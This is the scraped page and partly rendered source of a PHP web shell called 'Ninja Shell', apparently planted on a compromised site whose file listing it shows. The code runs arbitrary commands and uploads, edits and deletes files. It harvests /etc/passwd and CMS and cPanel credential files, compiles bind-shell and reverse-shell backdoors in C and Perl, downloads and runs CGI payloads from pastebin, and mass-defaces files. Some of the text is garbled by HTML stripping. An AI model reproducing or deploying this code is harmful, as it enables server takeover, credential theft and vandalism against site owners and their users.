NINJA SHELL

Current Directory : /usr/share/nginx/html/office/public/ (drwxr-xr-x)

+NEWFILE+ +NEWDIR+

NAME	TYPE	SIZE	LAST MODIFIED	OWNER\GROUP	PERMISSION	ACTION
acs	Dir	-	August 18 2023 8:50:04	999/997	drwxr-xr-x	Rename Delete
assets	Dir	-	September 29 2019 11:14:55	999/997	drwxr-xr-x	Rename Delete
files	Dir	-	July 10 2023 7:26:35	999/997	drwxr-xr-x	Rename Delete
font	Dir	-	September 05 2019 8:39:51	999/997	drwxr-xr-x	Rename Delete
img	Dir	-	August 14 2023 2:11:57	999/997	drwxr-xr-x	Rename Delete
lampiran	Dir	-	August 14 2023 12:08:17	999/997	drwxr-xr-x	Rename Delete
pdf	Dir	-	July 15 2023 2:24:59	999/997	drwxr-xr-x	Rename Delete
pengumuman	Dir	-	February 10 2022 1:22:42	999/997	drwxr-xr-x	Rename Delete
php	Dir	-	July 15 2023 2:23:58	999/997	drwxr-xr-x	Rename Delete
pict	Dir	-	January 20 2022 10:59:41	999/997	drwxr-xr-x	Rename Delete
sertifikat	Dir	-	August 14 2019 2:59:51	999/997	drwxr-xr-x	Rename Delete
storage	Dir	-	July 10 2023 5:38:16	999/997	drwxr-xr-x	Rename Delete
svg	Dir	-	September 04 2018 1:12:22	999/997	drwxr-xr-x	Rename Delete
template	Dir	-	July 10 2023 7:40:34	999/997	drwxr-xr-x	Rename Delete
theme	Dir	-	August 14 2023 1:19:11	999/997	drwxr-xr-x	Rename Delete
ttd	Dir	-	February 18 2022 1:01:03	999/997	drwxr-xr-x	Rename Delete
vendor	Dir	-	November 06 2019 5:29:28	999/997	drwxr-xr-x	Rename Delete
verification	Dir	-	August 18 2023 12:42:39	999/997	drwxr-xr-x	Rename Delete
.htaccess	File	0.337 KB	May 21 2019 5:47:04	999/997	-rw-r--r--	Edit Rename Download Delete
5.pdf	File	130.517 KB	May 08 2019 9:31:08	999/997	-rw-r--r--	Edit Rename Download Delete
6.pdf	File	45.045 KB	May 08 2019 9:31:08	999/997	-rw-r--r--	Edit Rename Download Delete
favicon.ico	File	0 KB	September 04 2018 1:12:22	999/997	-rw-r--r--	Edit Rename Download Delete
hilang.php	File	181.894 KB	August 16 2023 11:06:11	999/997	-rw-r--r--	Edit Rename Download Delete
index.php	File	1.837 KB	July 12 2023 1:07:27	999/997	-rw-r--r--	Edit Rename Download Delete
privacy_policy.html	File	7.386 KB	July 17 2019 1:37:24	999/997	-rw-r--r--	Edit Rename Download Delete
robots.txt	File	0 KB	July 12 2023 1:07:25	999/997	-rw-r--r--	Edit Rename Download Delete
sertifikat_upload.php	File	0 KB	July 10 2023 5:29:41	999/997	-rw-r--r--	Edit Rename Download Delete
upload_controller.php	File	0 KB	July 10 2023 5:29:57	999/997	-rw-r--r--	Edit Rename Download Delete

404 Not Found

Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache Server at Port 80

./Exorcism1337

NINJA SHELL

$.notify("', '", { className:"1",autoHideDelay: 2000,position:"left bottom" });' ]; $f = $o_[0] . 'Success!' . $o_[1]; $g = $o_[0] . 'Failed!' . $o_[1]; if (isset($_FILES["n"])) { $z = $_FILES["n"]["name"]; $r = count($z); for ($i = 0; $i < $r; $i++) { if ($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) { echo $f; } else { echo $g; } } } ?>

Current Directory : "; foreach ($k as $m => $l) { if ($l == '' && $m == 0) { echo '/'; } if ($l == '') { continue; } echo '' . $l . '/'; } echo ' (' . x("$d/$c") . ')'; print "
"; print (OS() === "Windows") ? windisk() : ""; echo "

"; echo '+NEWFILE+ +NEWDIR+'; echo ""; if ($_POST['do_cmd']) { echo "

" . exe($_POST['cmd']) . "

"; } $a_ = '

'; $b_ = '

'; $c_ = '

'; $d_ = '

'; if (isset($_GET["s"])) { echo $a_ . uhex($_GET["s"]) . $b_ . '

' . $GNJ[15]($GNJ[6](uhex($_GET["s"]))) . '

' . $c_; } elseif (isset($_GET["y"])) { echo $a_ . 'REQUEST' . $b_ . '

' . $d_ . '

';

			if (isset($_POST["2"])) {
				echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
			}

			echo '

' . $c_; } elseif (isset($_GET["e"])) { echo $a_ . uhex($_GET["e"]) . $b_ . '

BASE64 : ' . $d_ . ' ' . $c_ . ' '; if (isset($_POST["e"])) { if ($_POST["b64"] == "1") { $ex = $GNJ[7]($_POST["e"]); } else { $ex = $_POST["e"]; } $fp = $GNJ[17](uhex($_GET["e"]), 'w'); if ($GNJ[18]($fp, $ex)) { OK(); } else { ER(); } $GNJ[19]($fp); } } elseif (isset($_GET["x"])) { rec(uhex($_GET["x"])); if ($GNJ[26](uhex($_GET["x"]))) { ER(); } else { OK(); } } elseif (isset($_GET["t"])) { echo $a_ . uhex($_GET["t"]) . $b_ . ' ' . $d_ . ' ' . $c_; if (!empty($_POST["t"])) { $p = $GNJ[33]($_POST["t"]); if ($p) { if (!$GNJ[25](uhex($_GET["t"]), $p, $p)) { ER(); } else { OK(); } } else { ER(); } } } elseif (isset($_GET["k"])) { echo $a_ . uhex($_GET["k"]) . $b_ . ' ' . $d_ . ' ' . $c_; if (!empty($_POST["b"])) { $x = $_POST["b"]; $t = 0; for ($i = strlen($x) - 1; $i >= 0; --$i) $t += (int) $x[$i] * pow(8, (strlen($x) - $i - 1)); if (!$GNJ[12](uhex($_GET["k"]), $t)) { ER(); } else { OK(); } } } elseif (isset($_GET["l"])) { echo $a_ . '+DIR' . $b_ . ' ' . $d_ . ' ' . $c_; if (isset($_POST["l"])) { if (!$GNJ[11]($_POST["l"])) { ER(); } else { OK(); } } } elseif (isset($_GET["q"])) { if ($GNJ[10](__FILE__)) { $GNJ[38]($GNJ[9]); header("Location: " . basename($_SERVER['PHP_SELF']) . ""); exit(); } else { echo $g; } } elseif (isset($_GET[hex('info')])) { echo '

SYSTEM INFORMATION

						
			Server 					: ' . $_SERVER['HTTP_HOST'] . '
			Server IP 				: ' . $_SERVER['SERVER_ADDR'] . ' Your IP : ' . $_SERVER['REMOTE_ADDR'] . '
			Kernel Version 			: ' . php_uname() . '
			Software 					: ' . $_SERVER['SERVER_SOFTWARE'] . '
			Storage Space 			: ' . $used . "/" . $total . "(Free : " . $freespace . ")" . '
			User / Group 				: ' . $user . ' (' . $uid . ') | ' . $group . ' (' . $gid . ') 
			Time On Server 			: ' . date("d M Y h:i:s a") . '
			Disable Functions 			: ' . $show_ds . '
			Safe Mode 				: ' . $sm . '
			PHP VERSION 				: ' . phpversion() . ' On ' . php_sapi_name() . '

	Open_Basedir : ' . $show_obdir . ' | Safe Mode Exec Dir : ' . $show_exec . ' | Safe Mode Include Dir : ' . $show_include . '
	MySQL : ' . $mysql . ' | MSSQL : ' . $mssql . ' | PostgreSQL : ' . $pgsql . ' | Perl : ' . $perl . ' | Python : ' . $python . ' | Ruby : ' . $ruby . ' |  WGET : ' . $wget . ' | cURL : ' . $curl . ' | Magic Quotes : ' . $magicquotes . ' | SSH2 : ' . $ssh2 . ' | Oracle : ' . $oracle . '

'; } elseif (isset($_GET[hex('mass')])) { echo "

Mass Tools Ninja Shell

Mass Deface / Delete Files

Mass User Changer

Mass Title Changer

"; } elseif (isset($_GET[hex('symlink')])) { echo "

"; echo "

Symlink Ninja Shell

"; if (isset($_POST['symlink'])) { @set_time_limit(0); echo "

Symlink Ninja Shell

"; @mkdir('sym', 0777); $htaccess = "Options all n DirectoryIndex Sux.html n AddType text/plain .php n AddHandler server-parsed .php n AddType text/plain .html n AddHandler txt .html n Require None n Satisfy Any"; $write = @fopen('sym/.htaccess', 'w'); fwrite($write, $htaccess); @symlink('/', 'sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if (!$read_named_conf) { echo "

# Cant access this file on server -> [ /etc/named.conf ]

"; } else { echo "

"; foreach ($read_named_conf as $subject) { if (eregi('zone', $subject)) { preg_match_all('#zone "(.*)"#', $subject, $string); flush(); if (strlen(trim($string[1][0])) > 2) { $UID = posix_getpwuid(@fileowner('/etc/valiases/' . $string[1][0])); $name = $UID['name']; @symlink('/', 'sym/root'); $name = $string[1][0]; $iran = '.ir'; $israel = '.il'; $indo = '.id'; $sg12 = '.sg'; $edu = '.edu'; $gov = '.gov'; $gose = '.go'; $gober = '.gob'; $mil1 = '.mil'; $mil2 = '.mi'; $malay = '.my'; $china = '.cn'; $japan = '.jp'; $austr = '.au'; $porn = '.xxx'; $as = '.uk'; $calfn = '.ca'; if ( eregi("$iran", $string[1][0]) or eregi("$israel", $string[1][0]) or eregi("$indo", $string[1][0]) or eregi("$sg12", $string[1][0]) or eregi("$edu", $string[1][0]) or eregi("$gov", $string[1][0]) or eregi("$gose", $string[1][0]) or eregi("$gober", $string[1][0]) or eregi("$mil1", $string[1][0]) or eregi("$mil2", $string[1][0]) or eregi("$malay", $string[1][0]) or eregi("$china", $string[1][0]) or eregi("$japan", $string[1][0]) or eregi("$austr", $string[1][0]) or eregi("$porn", $string[1][0]) or eregi("$as", $string[1][0]) or eregi("$calfn", $string[1][0]) ) { $name = "

" . $string[1][0] . '

'; } echo " "; flush(); } } } } echo "

Domains	Users	symlink
' . $name . '	' . $UID['name'] . "	Symlink

"; } elseif (isset($_POST['symlink2'])) { $dir = path(); $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); $d0mains = @file("/etc/named.conf"); ##httaces if ($d0mains) { @mkdir("Exc_sym", 0777); @chdir("Exc_sym"); @exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex Exc.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any'; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo " "; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi("zone", $d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0])); echo ""; flush(); $dcount++; } } } echo "

S. No.	Domains	Users	Symlink
" . $dcount . "	" . $domains[1][0] . "	" . $user['name'] . "	Symlink

"; } else { $TEST = @file('/etc/passwd'); if ($TEST) { @mkdir("Exc_sym", 0777); @chdir("Exc_sym"); exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex Exc.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any'; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo " "; $dcount = 1; $file = fopen("/etc/passwd", "r") or exit("Unable to open file!"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/", "", $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++; } fclose($file); echo "

S. No.	Users	Symlink
" . $dcount . "	" . $matches . "	Symlink

"; } else { if ($os != "Windows") { @mkdir("Exc_sym", 0777); @chdir("Exc_sym"); @exe("ln -s / root"); $file3 = ' Options Indexes FollowSymLinks DirectoryIndex Exc.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any '; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "

Symlink2 Ninja Shell

"; $temp = ""; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':', $uid) . "\n"; } echo '
'; $temp = trim($temp); $file5 = fopen("test.txt", "w"); fputs($file5, $temp); fclose($file5); $dcount = 1; $file = fopen("test.txt", "r") or exit("Unable to open file!"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/", "", $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++; } fclose($file); echo "

ID	Users	Symlink
" . $dcount . "	" . $matches . "	Symlink

"; unlink("test.txt"); } else echo "Cannot create Symlink"; } } } elseif (isset($_POST['symlink_py'])) { $sym_dir = mkdir('ia_sympy', 0755); chdir('ia_sympy'); $file_sym = "sym.py"; $sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIiAgICAgICAgICAgICAgU3BlY2lhbCBHcmVldHogdG8gOiBQYWsgQ3liZXIgU2t1bGx6Ig0KcHJpbnQgIn4iKjYwDQoNCm9zLm1ha2VkaXJzKCdicnVkdWxzeW1weScpDQpvcy5jaGRpcignYnJ1ZHVsc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGJydWR1bC50eHQiKQ0KDQpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggYnJ1ZHVsLnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIg0KbSA9IG9wZW4oIi5odGFjY2VzcyIsIncrIikNCm0ud3JpdGUoaCkNCm0uY2xvc2UoKQ0KcHJpbnQgaHRhDQoNCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+U3ltbGluayBCeXBhc3MgMjAxNzxicj48Zm9udCBzaXplPTQ+TWFkZSBCeSBNaW5kbGVzcyBJbmplY3RvciA8YnI+UmVjb2RlZCBCeSBDb243ZXh0PC9mb250PjwvZm9udD48YnI+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0zPjx0YWJsZT4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJicnVkdWwucGh0bWwiLCJ3IikNCmlwcy53cml0ZShzZikNCg0KZm9yIGZ1c3IgaW4gc3VzcjoNCglmb3IgZnNpdGUgaW4gc2l0ZXg6DQoJCWZ1PWZ1c3JbMDo1XQ0KCQlzPWZzaXRlWzA6NV0NCgkJaWYgZnU9PXM6DQoJCQlpcHMud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9YnJ1ZHVsLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx"; $sym = fopen($file_sym, "w"); fwrite($sym, base64_decode($sym_script)); chmod($file_sym, 0755); $jancok = exe("python sym.py"); echo "
Done ... Klik Here"; } } elseif (isset($_GET[hex('config')])) { $dir = path(); if ($_POST) { $passwd = $_POST['passwd']; mkdir("Exc_config", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("Exc_config/.htaccess", "w"); fwrite($htc, $isi_htc); preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach ($user_config[1] as $user_Exc) { $user_config_dir = "/home/$user_Exc/public_html/"; if (is_readable($user_config_dir)) { $grab_config = array( "/home/$user_Exc/.my.cnf" => "cpanel", "/home/$user_Exc/.accesshash" => "WHM-accesshash", "/home/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_Exc/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_Exc/public_html/whm/configuration.php" => "WHMCS", "/home/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_Exc/public_html/forum/config.php" => "phpBB", "/home/$user_Exc/public_html/sites/default/settings.php" => "Drupal", "/home/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_Exc/public_html/app/etc/local.xml" => "Magento", "/home/$user_Exc/public_html/joomla/configuration.php" => "Joomla", "/home/$user_Exc/public_html/configuration.php" => "Joomla", "/home/$user_Exc/public_html/wp/wp-config.php" => "WordPress", "/home/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_Exc/public_html/wp-config.php" => "WordPress", "/home/$user_Exc/public_html/admin/config.php" => "OpenCart", "/home/$user_Exc/public_html/slconfig.php" => "Sitelok", "/home/$user_Exc/public_html/application/config/database.php" => "Ellislab", "/home1/$user_Exc/.my.cnf" => "cpanel", "/home1/$user_Exc/.accesshash" => "WHM-accesshash", "/home1/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb", "/home1/$user_Exc/public_html/config/koneksi.php" => "Lokomedia", "/home1/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home1/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS", "/home1/$user_Exc/public_html/whm/configuration.php" => "WHMCS", "/home1/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS", "/home1/$user_Exc/public_html/forum/config.php" => "phpBB", "/home1/$user_Exc/public_html/sites/default/settings.php" => "Drupal", "/home1/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop", "/home1/$user_Exc/public_html/app/etc/local.xml" => "Magento", "/home1/$user_Exc/public_html/joomla/configuration.php" => "Joomla", "/home1/$user_Exc/public_html/configuration.php" => "Joomla", "/home1/$user_Exc/public_html/wp/wp-config.php" => "WordPress", "/home1/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress", "/home1/$user_Exc/public_html/wp-config.php" => "WordPress", "/home1/$user_Exc/public_html/admin/config.php" => "OpenCart", "/home1/$user_Exc/public_html/slconfig.php" => "Sitelok", "/home1/$user_Exc/public_html/application/config/database.php" => "Ellislab", "/home2/$user_Exc/.my.cnf" => "cpanel", "/home2/$user_Exc/.accesshash" => "WHM-accesshash", "/home2/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb", "/home2/$user_Exc/public_html/config/koneksi.php" => "Lokomedia", "/home2/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home2/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS", "/home2/$user_Exc/public_html/whm/configuration.php" => "WHMCS", "/home2/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS", "/home2/$user_Exc/public_html/forum/config.php" => "phpBB", "/home2/$user_Exc/public_html/sites/default/settings.php" => "Drupal", "/home2/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop", "/home2/$user_Exc/public_html/app/etc/local.xml" => "Magento", "/home2/$user_Exc/public_html/joomla/configuration.php" => "Joomla", "/home2/$user_Exc/public_html/configuration.php" => "Joomla", "/home2/$user_Exc/public_html/wp/wp-config.php" => "WordPress", "/home2/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress", "/home2/$user_Exc/public_html/wp-config.php" => "WordPress", "/home2/$user_Exc/public_html/admin/config.php" => "OpenCart", "/home2/$user_Exc/public_html/slconfig.php" => "Sitelok", "/home2/$user_Exc/public_html/application/config/database.php" => "Ellislab", "/home3/$user_Exc/.my.cnf" => "cpanel", "/home3/$user_Exc/.accesshash" => "WHM-accesshash", "/home3/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb", "/home3/$user_Exc/public_html/config/koneksi.php" => "Lokomedia", "/home3/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home3/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS", "/home3/$user_Exc/public_html/whm/configuration.php" => "WHMCS", "/home3/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS", "/home3/$user_Exc/public_html/forum/config.php" => "phpBB", "/home3/$user_Exc/public_html/sites/default/settings.php" => "Drupal", "/home3/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop", "/home3/$user_Exc/public_html/app/etc/local.xml" => "Magento", "/home3/$user_Exc/public_html/joomla/configuration.php" => "Joomla", "/home3/$user_Exc/public_html/configuration.php" => "Joomla", "/home3/$user_Exc/public_html/wp/wp-config.php" => "WordPress", "/home3/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress", "/home3/$user_Exc/public_html/wp-config.php" => "WordPress", "/home3/$user_Exc/public_html/admin/config.php" => "OpenCart", "/home3/$user_Exc/public_html/slconfig.php" => "Sitelok", "/home3/$user_Exc/public_html/application/config/database.php" => "Ellislab" ); foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("Exc_config/$user_Exc-$nama_config.txt", "w"); fputs($file_config, $ambil_config); } } } } echo "Done"; } else { $baru = hex($dir); $baru2 = hex('bypass-passwd'); echo "

"; echo "

Config Grabber Ninja Shell

"; echo "

etc/passwd ( Error ? Bypass Here )

\n"; echo "

"; } } elseif (isset($_GET[hex('network')])) { $dir = path(); // bind connect with c if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c", $port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc " . $port . " " . $passwrd . " &"); $scan = exe("ps aux"); if (eregi("./bdc $por", $scan)) { $msg = "

Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.

"; } } // bind connect with perl elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp", $port_bind_bd_pl); exe("chmod 777 bdp"); $p2 = which("perl"); exe($p2 . " bdp " . $port . " &"); $scan = exe("ps aux"); if (eregi("$p2 bdp $port", $scan)) { $msg = "

Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.

"; } } // back connect with c elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c", $back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc " . $ip . " " . $port . " &"); $msg = "Now script try connect to " . $ip . " port " . $port . " ..."; } // back connect with perl elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp", $back_connect); exe("chmod +x bcp"); $p2 = which("perl"); exe($p2 . " bcp " . $ip . " " . $port . " &"); $msg = "Now script try connect to " . $ip . " port " . $port . " ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan, $wurl); if (is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>

Netsploit Ninja Shell

Port Binding

Connect Back

Load and Exploit

Port

Pass

IP

Port

url

cmd

"; echo "

CGI Ninja Shell

"; if (isset($_POST['cgi'])) { $cgi_dir = mkdir('ia_cgi', 0755); chdir('ia_cgi'); $file_cgi = "cgi.Index_Attacker"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Attacker \n AddHandler cgi-script .Index_Attacker \n AddHandler cgi-script .Index_Attacker"; $htcgi = fopen(".htaccess", "w"); $ch = curl_init("https://pastebin.com/raw/Lj46KxFT"); $cgi = fopen($file_cgi, "w"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); chmod($memeg, 0755); fclose($cgi); ob_flush(); flush(); echo "
Done ... Klik Here"; } elseif (isset($_POST['cgi2'])) { $cgi_dir = mkdir('ia_cgi', 0755); chdir('ia_cgi'); $file_cgi = "cgi2.Index_Attacker"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Attacker \n AddHandler cgi-script .Index_Attacker "; $htcgi = fopen(".htaccess", "w"); $ch = curl_init("https://pastebin.com/raw/ZPZMC6K4"); $cgi = fopen($file_cgi, "w"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); chmod($memeg, 0755); echo "
Done ... Klik Here"; } elseif (isset($_POST['cgipy'])) { $cgi_dir = mkdir('ia_cgi', 0755); chdir('ia_cgi'); $file_cgi = "cgipy.Index_Attacker"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Attacker \n AddHandler cgi-script .Index_Attacker \n AddHandler cgi-script .Index_Attacker"; $htcgi = fopen(".htaccess", "w"); $ch = curl_init("https://pastebin.com/raw/MYyXAXyY"); $cgi = fopen($file_cgi, "w"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); chmod($memeg, 0755); echo "
Done ... Klik Here"; } } elseif (isset($_GET[hex('mass_tool')])) { $dir = path(); echo ""; } else { echo " [-] Ternyata Tidak Boleh Menyabun Disini :(
"; } } function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc . '/' . $namafile; if ($dirb === '.') { if (file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif ($dirb === '..') { if (file_exists("" . dirname($dir) . "/$namafile")) { unlink("" . dirname($dir) . "/$namafile"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($lokasi)) { echo "DELETED $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc, $namafile); } } } } } } } function clear_fill($file, $index) { if (file_exists($file)){ $handle = fopen($file, 'w'); fwrite($handle, ''); fwrite($handle, $index); fclose($handle); } } function gass() { global $dirr, $index; chdir($dirr); $me = str_replace(dirname(__FILE__) . '/', '', __FILE__); $files = scandir($dirr); $notallow = array(".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "..", "."); sort($files); $n = 0; foreach ($files as $file) { if ($file != $me && is_dir($file) != 1 && !in_array($file, $notallow)) { echo "$dirr/$file ====> "; edit_file($file, $index); flush(); $n = $n + 1; } } echo "
"; echo "

$n Kali Anda Telah Ngecrot Disini

